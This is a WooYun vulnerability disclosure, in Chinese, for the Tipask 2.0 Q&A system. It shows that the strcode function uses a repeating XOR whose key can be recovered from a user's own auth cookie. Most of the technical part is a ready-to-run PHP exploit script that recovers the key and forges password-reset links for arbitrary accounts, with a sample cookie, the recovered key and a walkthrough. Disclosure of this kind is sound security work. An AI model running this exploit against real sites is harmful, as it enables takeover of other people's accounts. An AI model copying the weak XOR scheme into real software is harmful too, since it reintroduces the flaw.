当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026780

漏洞标题:Tipask 2.0 加密函数破解导致任意用户密码修改

相关厂商:Tipask

漏洞作者: 猪头子

提交时间:2013-06-24 16:29

修复时间:2013-09-22 16:30

公开时间:2013-09-22 16:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。
但是Tipask中使用的加密算法存在被破解的可能性,因此将导致包括任意用户密码修改等漏洞的发生。

详细说明:

在核心加密算法strcode函数中:

/* 通用加密解密函数,phpwind、phpcms、dedecms都用此函数 */
function strcode($string, $auth_key, $action= 'ENCODE') {
    $key = substr(md5($_SERVER[ "HTTP_USER_AGENT"] . $auth_key), 8, 18);
    $string = $action == 'ENCODE' ? $string : base64_decode($string);
    $len = strlen($key);
    $code = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $k = $i % $len;
        $code .= $string[$i] ^ $key[$k];
    }
    $code = $action == 'DECODE' ? $code : base64_encode($code);
    return $code;
}


可以看到加密的算法是异或,所以可以用密文和明文异或的方法反过来求出密钥key,如下:

function anti_strcode($authstr, $plaintxt)
{
      $key ='';
      $authstr = urldecode(base64_decode($authstr));     
      for($i = 0; $i < 18; $i++)
      {
            $key .= $authstr[$i] ^ $plaintxt[$i];
      }
      
      return $key;
}


key长度为18,因此我们要找一个明文长度超过18而被加密的字串,经过检查,发现cookie中的auth值长度超过了18,因此将针对cookie中的auth进行key猜解。

漏洞证明:

在Tipask的密码重置中,生成密码重置链接的关键字串是由strcode产生,因此可以利用破解后的key来达到任意密码修改功能。

<?php
printf("-------------------------------------------------------
Tipask 2.0 authkey decrypt exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------\n\n" );
if ($argc < 3) {
      print_r( "Usage:         php exp.php uid password auth_cookie\nexample:   php exp.php 1 s3cr4t AjAGAAcFVwcHBwYHUA8GU19UBwtTV1AGAQQMUgMEWwpSVg%3D%3D\n\n");
       exit();
}
$uid = $argv[1];
$password = md5($argv[2]);
$auth_cookie = $argv[3];
$str = "$uid \t$password ";
$key = anti_strcode("$auth_cookie ", " $str");
print "[+]Key: $key \n";
print "[*]Input the username you want to reset: ";
fscanf(STDIN, "%s\n", $username);
print "[*]Encrypting...\n";
$code = urlencode(strcode($username, $key));
print "[+]Reset password here: ?user/resetpass/$code \n";
//function
function anti_strcode($authstr, $plaintxt)
{
      $key = '';
      $authstr = urldecode(base64_decode($authstr));
            
       for($i = 0; $i < 18; $i++)
      {
            $key .= $authstr[$i] ^ $plaintxt[$i];
      }
       return $key;
}
function strcode($string, $key) {
    $len = 18;
    $code = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $k = $i % $len;
        $code .= $string[$i] ^ $key[$k];
    }
    $code = base64_encode($code);
    return $code;
}
?>


首先申请重置目标用户的密码

1.png


利用自己的注册用户的cookie解密key:

2.png


当前登录用户cookie中的auth为VjEFWAFbAwtXBlUDV1ZVCAEAUFkDBQFcVFcCUggCAlNVWg%3D%3D
然后进行解密:

3.png


获得key为d82ab802de152bf9bb
然后输入想要重置的用户:

5.png


获得了重置密码的链接。

6.png


7.png

修复方案:

估计厂商不会来认领,so

版权声明:转载请注明来源 猪头子@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝